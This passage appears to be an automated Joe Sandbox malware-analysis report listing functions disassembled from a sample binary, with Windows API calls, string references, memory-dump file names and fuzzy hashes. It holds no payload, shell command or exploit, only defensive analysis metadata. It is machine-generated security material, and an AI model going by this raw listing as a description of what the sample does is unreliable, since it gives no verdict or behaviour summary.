memmove.MSVCRT(00000000,00000008,\\?\,?,?,?,00401BC5,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000), ref: 004096DA

Strings

\\?\, xrefs: 004096BA, 004096D4

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

API ID: AllocFileHeapModuleNameValuememmovewcscmp
String ID: \\?\
API String ID: 3734239354-4282027825
Opcode ID: 0153655e129c1090b4fb96721347d81aa5438cd66e58ba985cbb1c9c08f4e59e
Instruction ID: 273bc576c06434c2caee33e7ea90b93358419674725e30c46c8a7bea9ec705d9
Opcode Fuzzy Hash: 0153655e129c1090b4fb96721347d81aa5438cd66e58ba985cbb1c9c08f4e59e
Instruction Fuzzy Hash: BBF0E2B31006017BC210677BDC85CAB7EACEB853747000A3FF515D24D2EA38D82496B8

Function 0040B236 Relevance: 6.3, APIs: 5, Instructions: 93COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040B2D7
memset.MSVCRT ref: 0040B2E0
memset.MSVCRT ref: 0040B2E9
memset.MSVCRT ref: 0040B2F6
memset.MSVCRT ref: 0040B302

Part of subcall function 0040C636: memcpy.MSVCRT(?,?,00000040,?,?,?,?,?,?,?,?,?,00000000,?,0040B275,?), ref: 0040C690
Part of subcall function 0040C636: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,0040B275,?), ref: 0040C6DF

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

API ID: memset$memcpy
String ID:
API String ID: 368790112-0
Opcode ID: 6af7cb9f910f70f93df9e3bab83db51edc5e588b158ebd52074512bae1687c56
Instruction ID: 0935afcf37e6329c3ac2d0f56793f6a9f9fc9668031c2f15978d8007e640a3dc
Opcode Fuzzy Hash: 6af7cb9f910f70f93df9e3bab83db51edc5e588b158ebd52074512bae1687c56
Instruction Fuzzy Hash: 322103317506083BE524AA29DC86F9F738CDB81708F40063EF241BA2C1CA79E54947AE

Function 00405BA0 Relevance: 6.2, APIs: 4, Instructions: 167memoryCOMMON

Download Yara Rule

APIs

HeapAlloc.KERNEL32(00000000,?), ref: 00405C6A
wcsncpy.MSVCRT ref: 00405CC0

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

API ID: AllocHeapwcsncpy
String ID:
API String ID: 2304708654-0
Opcode ID: abff55b24cf8305edd91d71e69c9c0649d4e3fc2b61a87c9063bbd8ae977bd8a
Instruction ID: a3f43ae3cc8438659badc3904afd778ac5f48c872593279c616423bb3bd2bb8e
Opcode Fuzzy Hash: abff55b24cf8305edd91d71e69c9c0649d4e3fc2b61a87c9063bbd8ae977bd8a
Instruction Fuzzy Hash: 6D51AD34508B059BDB209F28D844A6B77F4FF84348F544A2EF885A72D0E778E915CB99

Function 00406670 Relevance: 6.1, APIs: 4, Instructions: 90COMMON

Download Yara Rule

APIs

CharLowerW.USER32(00417032,?,?,?,?,?,?,?,?,?,00402745,00000000,00000000), ref: 00406696
CharLowerW.USER32(00000000,?,?,?,?,?,?,?,?,00402745,00000000,00000000), ref: 004066D0
CharLowerW.USER32(?,?,?,?,?,?,?,?,?,00402745,00000000,00000000), ref: 004066FF
CharLowerW.USER32(?,?,?,?,?,?,?,?,?,00402745,00000000,00000000), ref: 00406705

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

API ID: CharLower
String ID:
API String ID: 1615517891-0
Opcode ID: e161e10b7a4b34b45bc7c15099726f4e7ff8b3d71e89e60b0d1392e1659b6289
Instruction ID: 50cff0fc212774e4e1f85142edc8b720228546f3e888a8e5f893537154114361
Opcode Fuzzy Hash: e161e10b7a4b34b45bc7c15099726f4e7ff8b3d71e89e60b0d1392e1659b6289
Instruction Fuzzy Hash: 582176796043058BC710AF1D9C40077B7E4EB80364F86483BEC85A3380D639EE169BA9

Function 00412240 Relevance: 6.1, APIs: 4, Instructions: 60COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00412271
malloc.MSVCRT ref: 00412281
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041229B
malloc.MSVCRT ref: 004122B0

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

API ID: ByteCharMultiWidemalloc
String ID:
API String ID: 2735977093-0
Opcode ID: dda470ae4ce4e8229e703b02ef989f91deb9167292a565bef41a6c3ba200bf59
Instruction ID: 3c1085fe75aa08d7dfcf325d5fd6ce3d1ff6e0efa089dc1519f7c1eb2db8e9d3
Opcode Fuzzy Hash: dda470ae4ce4e8229e703b02ef989f91deb9167292a565bef41a6c3ba200bf59
Instruction Fuzzy Hash: F70145373413013BE2204685AC02FAB3B58CBC1B95F1900BAFF04AE6C0C6F3A80182B8

Function 004121A0 Relevance: 6.1, APIs: 4, Instructions: 60COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,-00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0040D0B8,00000000), ref: 004121D4
malloc.MSVCRT ref: 004121E4
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,-00000001,00000000,00000000,00000000,00000000,00000000), ref: 00412201
malloc.MSVCRT ref: 00412216

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

API ID: ByteCharMultiWidemalloc
String ID:
API String ID: 2735977093-0
Opcode ID: 00a490c9ef2dc5a478e4fad7c5361c88d21327c35d3ed7742fb63e43f6d77948
Instruction ID: ba92e613a2f9bf0a88025da3432e472bc54701246ba04d0c993b0b67be8a7a27
Opcode Fuzzy Hash: 00a490c9ef2dc5a478e4fad7c5361c88d21327c35d3ed7742fb63e43f6d77948
Instruction Fuzzy Hash: 9401F57B38130137E3205695AC42FBB7B59CB81B95F1900BAFB05AE2C1D6F76814C6B9

Function 00405436 Relevance: 6.0, APIs: 4, Instructions: 34threadCOMMON

Download Yara Rule

APIs

Part of subcall function 004053EA: EnterCriticalSection.KERNEL32(004186A8,?,?,-0000012C,004053D0,00000000,00401FC5,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000), ref: 004053F5
Part of subcall function 004053EA: LeaveCriticalSection.KERNEL32(004186A8,?,?,-0000012C,004053D0,00000000,00401FC5,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000), ref: 00405428

TerminateThread.KERNEL32(00000000,00000000,00000000,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000), ref: 00405446
EnterCriticalSection.KERNEL32(004186A8,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405452
CloseHandle.KERNEL32(-00000008,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405472

Part of subcall function 0040DB32: HeapFree.KERNEL32(00000000,-00000008,0040D44B,00000010,00000800,?,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?), ref: 0040DB6B

LeaveCriticalSection.KERNEL32(004186A8,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405486

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

API ID: CriticalSection$EnterLeave$CloseFreeHandleHeapTerminateThread
String ID:
API String ID: 85618057-0
Opcode ID: a2b12058037983e8feb28cac182eb15ba2e3b37f6182c0419abf98dc8b579576
Instruction ID: 3069acd899a723a1849542c16efb52ddeba99d38bb4cb8d15d413c759c742d3e
Opcode Fuzzy Hash: a2b12058037983e8feb28cac182eb15ba2e3b37f6182c0419abf98dc8b579576
Instruction Fuzzy Hash: CDF05432905610AFC2205F619C48AE77B79EF54767715843FF94573190D73868408E6E

Function 00403001 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 193COMMON

Download Yara Rule

APIs

Part of subcall function 0040DFC0: TlsGetValue.KERNEL32(0000000D,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004,00000000,00417070,00000008,0000000C), ref: 0040DFD7

Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB

Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402FDE,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189

Part of subcall function 00405EB0: CharUpperW.USER32(00000000,00000000,FFFFFFF5,00001000,00001000,?,?,00001000,00402FE6,00000000,00000008,00000001,00000000,00000000,00000000,00000000), ref: 00405F01

Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(00940000,00000000,?), ref: 0040DEF9

Part of subcall function 0040DEC0: RtlReAllocateHeap.NTDLL(00940000,00000000,?,?), ref: 0040DF1C

Part of subcall function 00402E9D: FindResourceW.KERNEL32(00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,0040439A,00000000,00000000,00000000,00000001,00000000,00000000,00000000), ref: 00402EC5
Part of subcall function 00402E9D: __fprintf_l.LIBCMT ref: 00402F1F

Part of subcall function 00409355: CoInitialize.OLE32(00000000), ref: 00409373
Part of subcall function 00409355: memset.MSVCRT ref: 00409381
Part of subcall function 00409355: LoadLibraryW.KERNEL32(SHELL32.DLL,?,?,0000000A), ref: 0040938E
Part of subcall function 00409355: GetProcAddress.KERNEL32(00000000,SHBrowseForFolderW), ref: 004093B0
Part of subcall function 00409355: GetProcAddress.KERNEL32(00000000,SHGetPathFromIDListW), ref: 004093BC
Part of subcall function 00409355: wcsncpy.MSVCRT ref: 004093DD
Part of subcall function 00409355: wcslen.MSVCRT ref: 004093F1
Part of subcall function 00409355: CoTaskMemFree.OLE32(?), ref: 0040947A
Part of subcall function 00409355: wcslen.MSVCRT ref: 00409481
Part of subcall function 00409355: FreeLibrary.KERNEL32(00000000,00000000), ref: 004094A0

Part of subcall function 00403CD7: FindResourceW.KERNEL32(00000000,0000000A,00000000,00000000,00000000,00000000,00000000,-00000004,00403A61,00000000,00000001,00000000,00000000,00000001,00000003,00000000), ref: 00403D07

PathAddBackslashW.SHLWAPI(00000000,00000200,FFFFFFF5,00000000,00000000,00000000,00000200,00000000,00000000,FFFFFFF5,00000003,00000000,00000000,00000000,00000000,00000000), ref: 004031CC

Part of subcall function 0040E020: wcslen.MSVCRT ref: 0040E037

PathRemoveBackslashW.SHLWAPI(00000000,00000000,00000000,00947DA0,00000000,00000000,00000200,00000000,00000000,00000200,FFFFFFF5,00000000,00000000,00000000,00000200,00000000), ref: 00403231

Part of subcall function 00402CA9: FindResourceW.KERNEL32(?,0000000A,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00402D44

Strings

$pA, xrefs: 004030CC

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

API ID: Value$FindResourcewcslen$AddressAllocateBackslashErrorFreeHeapLastLibraryPathProc$CharInitializeLoadRemoveTaskUpper__fprintf_lmemsetwcsncpy
String ID: $pA
API String ID: 790731606-4007739358
Opcode ID: fafddd55d836537589261c709968970c6775ae1a276d84be64f2893e19f462a9
Instruction ID: fee6f31afef46dfc3d4b18dc130868db542cea1a9d30875f0fa626089c73850b
Opcode Fuzzy Hash: fafddd55d836537589261c709968970c6775ae1a276d84be64f2893e19f462a9
Instruction Fuzzy Hash: E151F6B5904A007EE2007BF2DD82E3F266EDFD4719B10893FF844B9092C93C994DA66D

Function 004024F1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148COMMON

Download Yara Rule

APIs

GetCommandLineW.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 004025A3
PathRemoveArgsW.SHLWAPI(?), ref: 004025D9

Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402FDE,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189

Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(00940000,00000000,?), ref: 0040DEF9

Part of subcall function 004098C0: SetEnvironmentVariableW.KERNEL32(00948F58,00948F58,00404434,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004098D9

Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB

Part of subcall function 0040E020: wcslen.MSVCRT ref: 0040E037

Part of subcall function 00405170: TlsGetValue.KERNEL32(?,?,00402FED,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000), ref: 00405178

Part of subcall function 0040DF50: HeapFree.KERNEL32(00940000,00000000,00000000,?,00000000,?,00411DE4,00000000,00000000,-00000008), ref: 0040DF68

Strings

*pA, xrefs: 004025FF

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

API ID: Value$ErrorHeapLast$AllocateArgsCommandEnvironmentFreeLinePathRemoveVariablewcslen
String ID: *pA
API String ID: 1199808876-3833533140
Opcode ID: d71b0a94e292aaa5df852a5f67a936174220f907fb1fd7f815eb7f58dc0b4ad1
Instruction ID: 21a80edfc212e2aa9d277187ee9bfa0e7f9d15baa35618845dd156f20ee28a4c
Opcode Fuzzy Hash: d71b0a94e292aaa5df852a5f67a936174220f907fb1fd7f815eb7f58dc0b4ad1
Instruction Fuzzy Hash: 6C412DB5904701AED600BBB2DD8293F77ADEBD4309F108D3FF544A9092CA3CD849966E

Function 0040973A Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON

Download Yara Rule

APIs

Part of subcall function 0040D2E8: TlsGetValue.KERNEL32(?,00409869,00401DAB,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000,00000000,00000000,00000000,00000200), ref: 0040D2EF
Part of subcall function 0040D2E8: HeapAlloc.KERNEL32(00000008,?,?,00409869,00401DAB,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000,00000000,00000000), ref: 0040D30A
Part of subcall function 0040D2E8: TlsSetValue.KERNEL32(00000000,?,?,00409869,00401DAB,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000,00000000,00000000), ref: 0040D319

GetCommandLineW.KERNEL32(?,?,?,00000000,?,?,00409870,00000000,00401DAB,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015), ref: 00409754

Strings

", xrefs: 00409776
, xrefs: 0040976E

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

API ID: Value$AllocCommandHeapLine
String ID: $"
API String ID: 1339485270-3817095088
Opcode ID: 23df4b233d713070fc482b77f76cf6363686a3a5707749b1e186b32a761d8b54
Instruction ID: ab659b79707db7d7869a667e669445cd4c695224699636d93eb587c6e0e94742
Opcode Fuzzy Hash: 23df4b233d713070fc482b77f76cf6363686a3a5707749b1e186b32a761d8b54
Instruction Fuzzy Hash: 4A31A7735252218ADB74AF10981127772A1EFA2B60F18C17FE4926B3D2F37D8D41D369

Function 00409FB8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

_wcsicmp.MSVCRT ref: 00409FED
wcscmp.MSVCRT ref: 0040A026

Strings

$0A, xrefs: 00409FC4

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

API ID: _wcsicmpwcscmp
String ID: $0A
API String ID: 3419221977-513306843
Opcode ID: e4c63d424049f42e7b73257686f90aee44a2e069d1a72a0e60c522d0a3ac157e
Instruction ID: ce5e94a217663c04e8d70dd0a479d34a80eb67d33ce446282a7f9ad79867738e
Opcode Fuzzy Hash: e4c63d424049f42e7b73257686f90aee44a2e069d1a72a0e60c522d0a3ac157e
Instruction Fuzzy Hash: 2E11C476108B0A8FD3209F46D440923B3E9EF94364720843FD849A3791DB75FC218B6A

Function 00405700 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,00401207), ref: 00405722
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,?,00401207), ref: 00405746

Strings

$0A, xrefs: 0040570B

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

API ID: ByteCharMultiWide
String ID: $0A
API String ID: 626452242-513306843
Opcode ID: 6ebf4601a22723825f5cb97cb36f297afbf3d96316567957ce430f2db9d3b6d5
Instruction ID: 257aa3cf1744ec2ccb71e28fb2e26357a5123011e6015fa77bf79efc500ed16d
Opcode Fuzzy Hash: 6ebf4601a22723825f5cb97cb36f297afbf3d96316567957ce430f2db9d3b6d5
Instruction Fuzzy Hash: 16F0393A3862213BE230215A6C0AF672A69CB86F71F2542327B24BF2D085B5680046AC

Function 0040D57F Relevance: 5.1, APIs: 4, Instructions: 134memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,00000000,0040A0A4,00000000,00000001,?,?,?,00000000,00409ECC,?,?,00000000,?), ref: 0040D593
HeapAlloc.KERNEL32(00000000,-00000018,00000001,?,?,00000000,0040A0A4,00000000,00000001,?,?,?,00000000,00409ECC,?,?), ref: 0040D648
HeapAlloc.KERNEL32(00000000,-00000018,?,?,00000000,0040A0A4,00000000,00000001,?,?,?,00000000,00409ECC,?,?,00000000), ref: 0040D66B
LeaveCriticalSection.KERNEL32(?,?,00000000,0040A0A4,00000000,00000001,?,?,?,00000000,00409ECC,?,?,00000000,?,?), ref: 0040D6C3

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

API ID: AllocCriticalHeapSection$EnterLeave
String ID:
API String ID: 830345296-0
Opcode ID: 223ceb5fedc6bf78071f8d1d71221cc314eeccb9612ab2cf4b16bda0937aed7a
Instruction ID: 88038414d57a756cd7fad5c0050c74a6e8d04d69e7cdc083c9acd98434601a7e
Opcode Fuzzy Hash: 223ceb5fedc6bf78071f8d1d71221cc314eeccb9612ab2cf4b16bda0937aed7a
Instruction Fuzzy Hash: 9C51E370A00B069FC324CF69D980926B7F5FF587103148A3EE89A97B90D335F959CB94

Function 0040E130 Relevance: 5.1, APIs: 4, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 0040E145
HeapAlloc.KERNEL32(00940000,00000000,0000000A), ref: 0040E169
HeapReAlloc.KERNEL32(00940000,00000000,00000000,0000000A), ref: 0040E18D
HeapFree.KERNEL32(00940000,00000000,00000000,?,?,0040506F,?,0041702E,00401095,00000000), ref: 0040E1C4

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

API ID: Heap$Alloc$Freewcslen
String ID:
API String ID: 2479713791-0
Opcode ID: 360229d15a1fb6af201326cedd8d5f72cb5848c1c9ec4e5b388a4d503be7f4ab
Instruction ID: 6002b1c3f5819bc59b30070f24097f674b8c445c60846b79d2129d941eb5fd7b
Opcode Fuzzy Hash: 360229d15a1fb6af201326cedd8d5f72cb5848c1c9ec4e5b388a4d503be7f4ab
Instruction Fuzzy Hash: BA21F774604209EFDB14CF94D884FAAB7BAEB48354F108569F9099F390D735EA81CF94

Function 0040D498 Relevance: 5.1, APIs: 4, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000020,00000000,?,00000000,0040ADD5,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?,00000000), ref: 0040D4A3
HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,0040ADD5,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?), ref: 0040D4E3
LeaveCriticalSection.KERNEL32(00000020,?,00000000,0040ADD5,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0040D51E

Part of subcall function 0040DB72: HeapAlloc.KERNEL32(00000008,00000000,0040D3EC,00418610,00000014,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000), ref: 0040DB7E

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

API ID: AllocCriticalHeapSection$EnterLeave
String ID:
API String ID: 830345296-0
Opcode ID: 762af24c506bf6e2b9559650e0095779b3b7acce71c4fd081469871384e8466f
Instruction ID: 44ceb6562d1eb3065d03cece85d0244f92a2e0345c3169311120ea74ede9abb0
Opcode Fuzzy Hash: 762af24c506bf6e2b9559650e0095779b3b7acce71c4fd081469871384e8466f
Instruction Fuzzy Hash: 0A113D72604600AFC3208FA8DC40E56B7F9FB48325B14892EE896E36A1C734F804CF65

